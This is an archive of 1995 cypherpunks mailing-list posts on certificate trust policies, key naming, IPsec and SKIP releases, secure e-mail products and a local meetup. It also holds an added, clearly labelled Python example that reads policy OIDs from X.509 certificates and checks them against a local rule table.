Date: Wed, 29 Nov 1995 22:09:51 +0800
To: frantz@netcom.com
Subject: Re: The future will be easy to use
Message-ID: <9511291354.AA16998@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>There is more to this problem than how it is that I trust the key.  There
>is also what I trust it for.  ...
>It is hard to see how to record the information about how much I trust the
>recipient's systems security.

Bingo!  This is one of the hard parts of certificate authorities; just
what are you attesting to?  The American Bar Association has a big document
for public review that addresses what this might mean; there are a couple
of RFC's that specify CA policies (one from COST in Sweden, I think), and
RSA and/or Verisign will give you their policy in hardcopy.

In x.509v3 certificates, there is an extensible field where the key-signer
can put arbitrary data.  The intent is apparently that you put the ISO
object-ID (you know, those funny 1.3.2.11.... numbers) of the policy
document.

There is, of course, no way to interpret the semantics of this electronically.
It will be interesting to see how various companies address this issue,
for example as they start to support arbitrary CA's in browsers or servers
while doing commerce over the web.
	/r$
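
The policy-OID field described above, combined with James A. Donald's suggestion elsewhere in this thread that software can follow set policies for a small known set and refer everything else to a person, as an added example that is not part of the original messages. The rule table, the OIDs under the 2.999 example arc, and the choice to take the most cautious action are assumptions of this sketch.

```python
"""Act on X.509v3 certificatePolicies OIDs with a local rule table (stdlib only)."""

# Constructed rule table: the OIDs sit under 2.999, the arc reserved for
# examples, and the meanings attached to them are invented for this sketch.
LOCAL_RULES = {
    "2.999.1.1": "accept",  # assumed meaning: CA met the key holder in person
    "2.999.1.2": "ask",     # assumed meaning: CA only checked an e-mail address
}
SEVERITY = {"accept": 0, "ask": 1, "reject": 2}


def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the DER element starting at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("bad DER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("DER value runs past end of buffer")
    return tag, buf[pos:pos + length], pos + length


def decode_oid(body):
    """Turn the content bytes of an OBJECT IDENTIFIER into dotted form."""
    if not body or body[-1] & 0x80:
        raise ValueError("malformed OID")
    arcs, value = [], 0
    for byte in body:
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:
            arcs.append(value)
            value = 0
    first = arcs[0]  # the first two arcs share one sub-identifier
    head = [0, first] if first < 40 else [1, first - 40] if first < 80 else [2, first - 80]
    return ".".join(str(arc) for arc in head + arcs[1:])


def parse_policies(ext_value):
    """List the policy OIDs in a certificatePolicies extension value."""
    tag, body, end = read_tlv(ext_value, 0)
    if tag != 0x30 or end != len(ext_value):
        raise ValueError("expected exactly one SEQUENCE")
    oids, pos = [], 0
    while pos < len(body):
        tag, info, pos = read_tlv(body, pos)
        if tag != 0x30:
            raise ValueError("expected PolicyInformation SEQUENCE")
        tag, oid_body, _ = read_tlv(info, 0)  # qualifiers after the OID are skipped
        if tag != 0x06:
            raise ValueError("expected policyIdentifier OID")
        oids.append(decode_oid(oid_body))
    if not oids:
        raise ValueError("empty policy list")
    return oids


def decide(ext_value, rules=LOCAL_RULES):
    """Return (action, unknown_oids); the most cautious action wins."""
    try:
        oids = parse_policies(ext_value)
    except ValueError:
        return "reject", []  # unparseable input is never handed to the user as-is
    unknown = [oid for oid in oids if oid not in rules]
    actions = [rules.get(oid, "ask") for oid in oids]  # unknown OID: a human decides
    return max(actions, key=SEVERITY.__getitem__), unknown


def der(tag, body):
    """Encode one short DER element; used only to build the samples below."""
    if len(body) >= 0x80:
        raise ValueError("sample helper handles short elements only")
    return bytes([tag, len(body)]) + body


# Constructed sample extension values (not taken from any real certificate).
IN_PERSON = der(0x30, der(0x06, bytes.fromhex("88370101")))   # 2.999.1.1
EMAIL_ONLY = der(0x30, der(0x06, bytes.fromhex("88370102")))  # 2.999.1.2
CPS = der(0x30, der(0x30, der(0x06, bytes.fromhex("2b06010505070201"))
                    + der(0x16, b"http://ca.example/cps")))
UNLISTED = der(0x30, der(0x06, bytes.fromhex("8837072a")) + CPS)  # 2.999.7.42
ANY_POLICY = der(0x30, der(0x06, bytes.fromhex("551d2000")))  # 2.5.29.32.0

SAMPLE_IN_PERSON = der(0x30, IN_PERSON)
SAMPLE_EMAIL_ONLY = der(0x30, EMAIL_ONLY)
SAMPLE_MIXED = der(0x30, IN_PERSON + UNLISTED)
SAMPLE_ANY_POLICY = der(0x30, ANY_POLICY)

if __name__ == "__main__":
    for name in ("SAMPLE_IN_PERSON", "SAMPLE_EMAIL_ONLY", "SAMPLE_MIXED",
                 "SAMPLE_ANY_POLICY"):
        print(name, decide(globals()[name]))
```

The OID itself carries no meaning the code can check; everything the program "knows" about a policy comes from the local table, which is the point both messages make.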




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Wed, 29 Nov 1995 22:48:49 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511280435.UAA08732@blob.best.net>
Message-ID: <9511291431.AA14541@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald writes

> Specs, anyone?
>
> I suggest a few requirements:
>
> Store the keys, and information about the keys in a *real* database
> ...

Is this worth the complexity/cost? I'd have thought that the amount of
data involved would be small enough that index hashing would be
overkill, and I can't think of any operations that would require a full
up db engine.

Am I missing something?

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 29 Nov 1995 17:44:04 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511281801.NAA00386@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951129093109.12710F-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   what about the Sun release announced today? --it is fully functional
with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3
or gcc compilers?  Check out http://skip.incog.com.  source to the SKIP
key management and IP layer encryption package for SunOs 4.x. 

On Tue, 28 Nov 1995, Perry E. Metzger wrote:

> 
> Jonathan Zamick writes:
> > This discussion was based on a group of people getting together to create
> > a new easy to use package for handling keys and such. The government is
> > going to try to take a dominant stance, and mandate elements of it.
> 
> So we can ignore them. Big deal. They have no laws with which to
> enforce their desires.
> 
> > However, it is possible, even in an antagonistic relationship, to develop
> > positive feedback.
> 
> Who cares? An hour spent talking to an idiot from Washington is better
> spent writing good code unless there is a law pending in congress, in
> which case you are probably better off paying someone who knows what
> they are doing to do the talking for you.
> 
> > Returning to the original topic though, do we want to get a smaller list
> > together to spec out some ideas for the project that was discussed? A
> > simple, transparent, tool which would allow people to use strong encryption
> > without having to think about it?
> 
> You mean, like IPSEC/Photuris? I'll be running IPSEC (but sadly not
> Photuris, although I'll be trying to port Aggelos Keromytis' version
> at some point) on my laptop at the IETF meeting in Dallas (provided
> that I can buy a laptop in time.)
> 
> There are three things we are currently missing in the architecture,
> IMHO.
> 
> 1) We need a certificate system to replace X.509 and that plays nicely
>    with distributed databases.
> 2) We need to implement the Eastlake/Kaufman method for embedding
>    certificates in the DNS or something similar.
> 3) We need a good entity naming model.
> 
> Given all those being implemented, sometime soon I can see people
> telnetting or ftping hither and thither without ever noticing or
> caring that their sessions are completely encrypted.
> 
> We also have the following need:
> 
> 4) A good MIME mailer (that looks like NeXT Mail or something like it)
>    which has hooks for something MOSSlike that uses the same
>    certificate infrastructure described in 1-3 above.
> 5) SHTTP capable browsers that also use 1-3 listed above.
> 
> .pm
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 29 Nov 1995 23:11:43 +0800
To: cypherpunks@toad.com
Subject: Re: Encrypted Email
Message-ID: <Pine.BSD.3.91.951129094944.5117M-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain



 
Connie, 
 
 
On 11 27 95 you asked 
 
    Can anybody briefly summarize for me some options for 
    encrypting email that are secure? I know about PGP but 
    I need something for (my environment) with an easy to 
    use interface (PC-Windows) - for use by people who 
    really aren't very computer literate. 
 
 
The following item from 11 27 95 Computerworld 58 may be 
helpful: 
 
 CommTouch Software, Inc. in San Mateo, Calif., announced 
 a secure Internet E-mail package called Pronto Secure. 
 
 It allows connected and disconnected users to send and 
 encrypt Internet mail.  It supports many Internet security 
 protocols, such as Power One-Time Pad, Pretty Good Privacy, 
 Privacy Enhanced Mail, Secure Multipurpose Internet Mail 
 Extensions (S / MIME) and MIME Object Security Services. 
 
 Pronto Secure, which will ship in March, will require users 
 to replace their existing Internet mail systems....  Comm- 
 Touch plans to ship by mid-1996 a security module that is 
 Messaging Application Programming Interface-compliant and 
 works with a user's existing mail [system]. 
 
 
At p 66 of the same issue, there's a listing of "Recent in- 
formation security product announcements."  CommTouch is 
listed there; its Internet address is 
 
                     micheleb@ipri.com 
 
and a single copy of Pronto Secure is US $299 list. 
 
ipri.com = InterActive Public Relations, Inc in 'Frisco. 
 
 
Cordially, 
 
Jim 
 
  
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 29 Nov 1995 23:42:20 +0800
To: cypherpunks@toad.com
Subject: WAY_lad
Message-ID: <199511291529.KAA22826@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-29-95. FiTi:

   "Information highway needs rules of the road, says report."

      Pointing out the possibility of technical
      incompatibilities and trade friction if companies are
      treated differently in different markets, the report
      outlines the case for a "global regulator" within the
      structure of the new World Trade Organisation. It points
      out that issues such as intellectual property rights,
      encryption and government control on cross-ownership
      have global rather than national aspects. "Encryption,
      for example, raises tricky and emotive issues connected
      with organised crime and national security and cannot be
      treated simply as a business problem."

   No revolution for software [Editorial]

      Today's software market is the way it is not because of
      some evil conspiracy in Seattle, Microsoft's home town,
      but because it meets most consumers' interests most of
      the time. The power to set standards follows from that
      success. Changing technology widens the range of
      possible market structures, but does not affect
      customers' underlying needs and preferences. In the
      battle between the technologically possible and the
      economically attractive, economics always wins.


   WAY_lad  (7 kb)


FiTi on-line at <www.ft.com> for waylaying top article.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 29 Nov 1995 23:44:58 +0800
To: cypherpunks@toad.com
Subject: NOH_ide
Message-ID: <199511291530.KAA23283@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-29-95. Washrag:

   "Postal Service Awards Contracts to Develop Computer
   Kiosks."

      The Postal Service predicted "more than 10,000" kiosks
      could be installed in post offices, libraries and
      shopping malls "within the next few years." The Postal
      Service is the lead government agency on the project,
      one of several administration initiatives designed to
      provide the public with computer access to government
      information.

   "CIA, Pentagon Back NIMA 'Concept' Combining Spy Satellite
   Photo Units."

      The Pentagon and the CIA announced an agreement
      yesterday endorsing the "concept" of consolidating eight
      defense and intelligence agencies -- those responsible
      for managing spy satellite photos and related tasks --
      into a new National Imagery and Mapping Agency.

   NOH_ide  (10 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 23:49:18 +0800
To: cypherpunks@toad.com
Subject: Re: SKIP Source Release is out!
In-Reply-To: <9511290122.AA26147@monster.incog.com>
Message-ID: <199511291534.KAA02780@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Markson writes:
> Check out http://skip.incog.com.  We've released the source to the SKIP
> key management and IP layer encryption package for SunOs 4.x.

SKIP is a non-standard being pushed by Sun.

Admittedly, it is available for FTP. However, that's just because I
don't have an FTP site for the NRL IPsec + IPv6 stuff.

Anyone who'd like to help me put the sources to the NRL IPsec + IPv6
implementation up for FTP is invited to get in touch. It will run on
4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be
pretty portable to other similar Berkeley based machines.

It won't "run out of the box" on NetBSD as it stands -- I should have
it nicely packaged up to do that before the end of the week.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 30 Nov 1995 10:34:37 +0800
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: The future will be easy to use
In-Reply-To: <v02120d02ace0fcab0df8@[157.22.240.13]>
Message-ID: <Pine.SOL.3.91.951129104350.18458D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Jonathan Zamick wrote:
> Returning to the original topic though, do we want to get a smaller list
> together to spec out some ideas for the project that was discussed? A
> simple, transparent, tool which would allow people to use strong encryption
> without having to think about it?

It should be worth noting that I hope to put out the next version of
SSLeay in less than a week (I hope, depending on how many nights I don't
sleep :-) and it should include a 'demo' CA application. It will probably
only use simple text indexes and directories for storage but I intend it to
be able to generate CRL and process certificate requests.  The only
question is do I put in support to output the certificate using a
netscape/verisign compatible format :-).  If nothing else, this should be
a good starting point for adding a nice GUI front end and a real database
backend.  The application will be mostly a front-end to the SSLeay library
so if I finish most of my documentation by then, others should be able to
write a real CA application. 

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 30 Nov 1995 00:22:11 +0800
To: jamesd@echeque.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511290659.WAA19886@blob.best.net>
Message-ID: <9511291555.AA25090@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 27 Nov 1995 22:57:25 -0800
>From: "James A. Donald" <jamesd@echeque.com>
>
>At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>>That's true.  What the user would have to see is some icon (or, for
>>text-bound folks, a temporary unique string) until the user chooses and
>>assigns the appropriate alias.  That icon would have no meaning by itself.
>>It would acquire a meaning by being associated with some message or set of
>>messages:
>
>Better method:  Creator of the key names it:  Usually after himself or
>his role:  The recipients key database detects and resolves cases 
>where two different keys have identical names in accordance with
>certification rules.

That's today's method, more or less.  It doesn't address my needs.  The
name you pick for your key may or may not mean anything to me.  It might be
pronounceable, giving it some advantage over a radix-64 string, but it
might also be non-unique, making it worthless as an identifier.

What means something to me is whatever name (or symbol) I assign to the
person behind the key in question.  That's the one in my mind and therefore
the only one of interest to me.  You, however, don't know what's in my
mind.  You don't even know my preferred symbol set.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLyCVlQXJENzYr45AQEqEQP+O23i/6bcPX60i249150mv39WdoO0sL1w
pUtiZRs2PLACYTMA+DVP28upD4HRrk3/5Vd76EojPm5R8P/DWP190CccRo0t4xZ4
fM1kqEanvw1unV3Kd37ZjhD7tme5oN/v0ipjB2ETsrnowJnZ8HYhiF+WClK5ShhD
gEAg71NQux8=
=RyHR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 00:11:09 +0800
To: attila <attila@primenet.com>
Subject: Re: The future will be easy to use
In-Reply-To: <Pine.BSD.3.91.951129093109.12710F-100000@usr1.primenet.com>
Message-ID: <199511291555.KAA02851@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



attila writes:
> 
>    what about the Sun release announced today? --it is fully functional
> with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3
> or gcc compilers?  Check out http://skip.incog.com.  source to the SKIP
> key management and IP layer encryption package for SunOs 4.x. 

Ah, yes. The non-standard from Sun.

It doesn't do D-H negotiation, by the way. It uses something I'd call
inferior. Read the flames in ipsec and ipsec-dev for details.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 Nov 1995 00:08:09 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: key for Alice as promised (not)
Message-ID: <199511291558.KAA15623@homeport.org>
MIME-Version: 1.0
Content-Type: text


> > >Can you imagine??  I'm simply not willing to fool myself into thinking 
> > >that I have security by posting a key and using PGP.
> > 
> > Unless you can post some proof that PGP is insecure, stop insisting it is.
> 
> PGP is really not the issue.  The issue is more my security and the
> environment that I use PGP in.  I don't have a trusted machine to run PGP
> on.  Anyone who wants to can come up to machine and copy my secret keyring
> or they can even watch me typing my password in. 

	Threat, please??  Do people often stand over your shoulder as
you type?  Enter your office, point guns at you, and take a backup of
your entire computer?  Have you considered putting the secret keyring
on a floppy and locking it in your desk/safe when you're not actually
in the office? (Or home..)

> So, I don't fool myself, and I don't use PGP, except for things like
> exchanging a one-time pad with someone when I've already sent the message
> out across another delivery mechanism, like on a floppy delivered by
> courier. 

	I don't follow.  You're claiming that PGP is good enough to
transfer OTPads, but not good enough to sign pseudonymous messages?

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 Nov 1995 00:17:48 +0800
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: Microsoft weak encryption
In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <199511291559.KAA15633@homeport.org>
MIME-Version: 1.0
Content-Type: text


Joel McNamara wrote:

| Peter Gutmann has an interesting article in sci.crypt, demonstrating how
| weak Microsoft's encryption is with basic access control in Windows for
| Workgroups (I'm assuming Win95 uses the same algorithm).  Essentially, he
| shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
| files.  I think a t-shirt is definitely in order for this.

	While Peter did a nice job of showing how Windows stores
passwords, my understanding is that those passwords are decrypted by
Windows, and sent over the net in the clear.  Seems much easier to
snarf them there..

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Thu, 30 Nov 1995 00:27:40 +0800
To: cypherpunks@toad.com
Subject: Re: SKIP Source Release is out!
Message-ID: <199511291606.LAA30779@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:

>Anyone who'd like to help me put the sources to the NRL IPsec + IPv6
>implementation up for FTP is invited to get in touch. It will run on
>4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be
>pretty portable to other similar Berkeley based machines.

What licensing requirements exist for people who might want to 
use this code in their products? In particular, does one need to 
obtain any licensing from RSA or Cylink? 

--Michael Smith
  smithmi@dev.prodigy.com

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 00:34:52 +0800
To: smithmi@dev.prodigy.com (Michael Smith)
Subject: Re: SKIP Source Release is out!
In-Reply-To: <199511291606.LAA30779@tinman.dev.prodigy.com>
Message-ID: <199511291612.LAA02926@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Smith writes:
> Perry Metzger writes:
> 
> >Anyone who'd like to help me put the sources to the NRL IPsec + IPv6
> >implementation up for FTP is invited to get in touch. It will run on
> >4.4BSD machines (i.e. BSDI, NetBSD, FreeBSD, etc) and should be
> >pretty portable to other similar Berkeley based machines.
> 
> What licensing requirements exist for people who might want to 
> use this code in their products? In particular, does one need to 
> obtain any licensing from RSA or Cylink? 

No. It doesn't contain any public key stuff because it isn't the key
management component.

It's all available under a Berkeley style license, which permits
unrestricted commercial use, and complies with RFC 1825, 1826, 1827,
1828 & 1829.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ATTGIS.com>
Date: Thu, 30 Nov 1995 03:48:27 +0800
To: cypherpunks@toad.com
Subject: San Diego Cpunks Physical Meeting
Message-ID: <9511291918.AA11333@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, December 7, 1995

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop".  Get the latest update of Lance Cottrell's anonymous
e-mail server, "mixmaster", exchange keys, and discuss other topical
subjects.  If you are into what's happening on the list, encryption,
privacy, The Mission is the place to be.

   Don't forget to bring your public key  fingerprint and forms of
identification.  If you can figure out how to get it on the back of a
business card, that would be cool.  

   Drop me a note if you plan to attend.

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and Garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 30 Nov 1995 01:04:48 +0800
To: jamesd@echeque.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511290707.XAA24211@blob.best.net>
Message-ID: <9511291629.AA28948@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 27 Nov 1995 23:05:29 -0800
>From: "James A. Donald" <jamesd@echeque.com>
>
>At 03:30 PM 11/28/95 EST, Carl Ellison wrote:
>> Of course.  This isn't the base case.  We would have some keys which I sign
>> based on my own personal knowledge; things handed to me by people I know;
>> some possibly published in the paper where the real key owner would see the
>> claim and be able to contest it.
>
>You are making the same erroneous assumption that Phil made when he
>designed the Web of trust:  You assume that it is important and 
>interesting to link key ID's to physical bodies.  

Thanks for that reminder.  I am actually not bound to the notion of keys
being only for people.  I'm a defender of the rights of disembodied
processes from way back :-).  However, this particular discussion was
focussed on people.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLyKOVQXJENzYr45AQEzdAP/WcAaOE8RsxvNCnY0MBY0aqVboWPKU7aj
toairhNM7i5J+vacN30tBefU51+gmhQIdP3jRuArbSr0+xdrtNqiWBAiYaxiZz4X
g2/nUui2uaPuXF0tdXlN4ILSJQ0QV42mppOBXWjimcWXRioSQVBGxGS7X1tsPF+/
5AvEQha4h4I=
=MVIQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 30 Nov 1995 04:31:19 +0800
To: cypherpunks@toad.com
Subject: Whitehouse PROFS email privacy case
Message-ID: <199511291931.LAA02934@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


this was a hot subject a long time ago on the list, here's a book
with the scoop


------- Forwarded Message
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: PROFS Case: Book on White House e-mail

Date: Wed, 22 Nov 1995 12:50:49 -0500 (EST)
From: Eddie Becker <ebecker@cni.org>
Subject: PROFS Case: Book on White House e-mail

  NEW BOOK PROVIDES NARRATIVE ON PROFS CASE
  ALONG WITH REMARKABLE PRIMARY DOCUMENTS.

  Following Press Release    11/22/96

  REVELATIONS FROM --WHITE HOUSE E-MAIL: THE
  TOP SECRET COMPUTER MESSAGES THE
  REAGAN/BUSH WHITE HOUSE TRIED TO DESTROY,
  Edited by Tom Blanton (New York: The New Press, 256 pp.
  plus 1.44 megabyte computer disk), distributed by W.W. Norton
  & Company.

  For more information, contact: Tom Blanton (o) 202/994-7000,
  (h) 301/718-6543, nsarchiv@gwis2.circ.gwu.edu

  SECRET SUPPORT FOR SADDAM HUSSEIN

  Top Reagan administration officials, including Colin Powell,
  presided over covert intelligence support to Saddam Hussein
  during the Iran-Iraq War, including targeting information on
  Iranian civilian infrastructure for Saddam's SCUD missiles.  In
  secret e-mail messages, National Security Council staffer William
  Cockell recommended -- and Deputy National Security Adviser
  Alton Keel agreed -- they cover-up the assistance to Saddam,
  because "it is difficult to characterize this as defensive assistance."
  [pp. 36-41]  Subsequently, while Powell served as Deputy
  National Security Adviser in 1987, the Reagan administration
  discussed a "shopping list" of pro-Iraq actions in order to "stiffen
  them up." [pp.235-237]

  HELPING NORIEGA "CLEAN UP HIS IMAGE"

  Three months after Seymour Hersh and The New York Times
  exposed Manuel Noriega's involvement in drugrunning and
  murder, Noriega approached the National Security Council staff
  with an offer to assassinate the Nicaraguan Sandinista leadership.
  Oliver North relayed the offer to his boss, National Security
  Adviser John Poindexter, writing that "you will recall that over the
  years Manuel Noriega in Panama and I have developed a fairly
  good relationship."  Poindexter replies, "I have nothing against him
  other than his illegal activities" and approves a North meeting with
  Noriega -- as does Secretary of State George Shultz.  The
  bottom line?  The White House agrees to help Noriega "clean up
  his image" in return for Panamanian sabotage operations against
  the Nicaraguan Sandinistas. [pp. 23-25]

  THE WHITE HOUSE SENDS A COCAINE CONSPIRATOR
  TO CLUB FED

  Top Reagan administration officials from the White House,
  Pentagon, and Justice Department just said yes to a reduced
  prison sentence (in a minimum security facility) for a Honduran
  colonel and sometime CIA asset who was convicted of cocaine
  trafficking and conspiracy to assassinate the civilian president of
  Honduras, because otherwise the colonel might "start singing
  songs nobody wants to hear" about covert operations in
  Honduras.  [pp. 42-48]

  SECRET DEALS WITH LOBBYISTS ON A
  CONTROVERSIAL CONGRESSIONAL VOTE

  The White House struck a secret deal with the American Israel
  Public Affairs Committee in the spring of 1986 to avoid an
  AWACS-style all-out battle on a Saudi arms deal vote, and in
  return got AIPAC's help on foreign aid funding and on the
  Iran-contra scandal.  But National Security Council staffer Howard
  Teicher warned, "whatever one may think of the jewish
  leadership, the 'masses' are rarely if ever swayed by what the
  rational, reasonable leaders say.  instead, it is the israel right or
  wrong demagogues at the grassroots level that will try to take
  advantage of the leadership's pusillanimity."  [pp. 150-157]

  HIDDEN FAILURES OF THE POLYGRAPH
  (PRECURSORS OF ALDRICH AMES)

  According to the National Security Council's top
  counterintelligence official in 1985, career FBI agent David
  Major, two out of the 48 individuals indicted, arrested and/or
  convicted of espionage against the U.S. in the years 1975-85,
  had successfully deceived the CIA's favorite screening tool, the
  polygraph (lie detector) -- a 4% error rate.  (Aldrich Ames
  subsequently beat the polygraph twice.)  [p.220]

  ROSS PEROT'S EGO RIDES AGAIN

  Ross Perot "sandbagged" the Reagan White House at a 1986
  Congressional hearing on the POW-MIA issue, according to the
  lead White House staffer on the issue, Col. Richard Childress,
  who also wrote, "he has played into Hanoi's hands for his ego and
  doesn't even know it."  [p. 162]

  MORE WHITE HOUSE E-MAIL STORIES

  * Then-Israeli Defense Minister Yitzhak Rabin personally
  arranged with Oliver North for secret shipments of captured PLO
  weapons to Central America in September 1986, with the
  approval of the National Security Adviser.  Rabin also
  commented, according to North's e-mail, "at some length about
  his low opinion of our intel service [CIA] - both in terms of
  coverts ops and intelligence collecting," and promised "no more
  Pollards."  [pp. 119-122]

  * The regular breakfast meetings in the Reagan administration of
  the National Security Adviser, the Secretary of State (George
  Shultz), and the Secretary of Defense (Caspar Weinberger) often
  degenerated into what staffers called "slugfests."  p. 193

  * Contrary to claims in a recent autobiography, National Security
  Adviser Robert McFarlane did not anticipate the collapse of the
  Soviet Union and craft U.S. policy accordingly to pressure the
  Soviets, rather, in his 1984 e-mail, McFarlane wrote "it will not
  change ideologically and therefore our task is to establish a basis
  for peaceful competition with them."  p.189

  * At the behest of Israeli Prime Minister Shimon Peres, Vice
  President George Bush proposed a "7-point peace plan" during a
  Middle East trip in 1986, only to have it shot down by White
  House and State Department opposition back in Washington.
  p. 200

  * While serving as Deputy National Security Adviser to President
  Reagan in 1987, Colin Powell lived in an alarmed house at Fort
  McNair which "scared hell out of the family initially and then
  became amusing when the MPs assaulted the house every time
  the alarm misfired."  p. 211

  * White House staffers joked about CIA Director William
  Casey's renowned "mumbles," writing, "The last time he told
  Goldwater we were going to 'lay some mines in Nicaragua,'
  Goldwater thought he said we were going to 'pay some fines for
  some joggers.'"  p. 214

                                        END


- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 30 Nov 1995 01:07:15 +0800
To: frantz@netcom.com
Subject: Re: The future will be easy to use
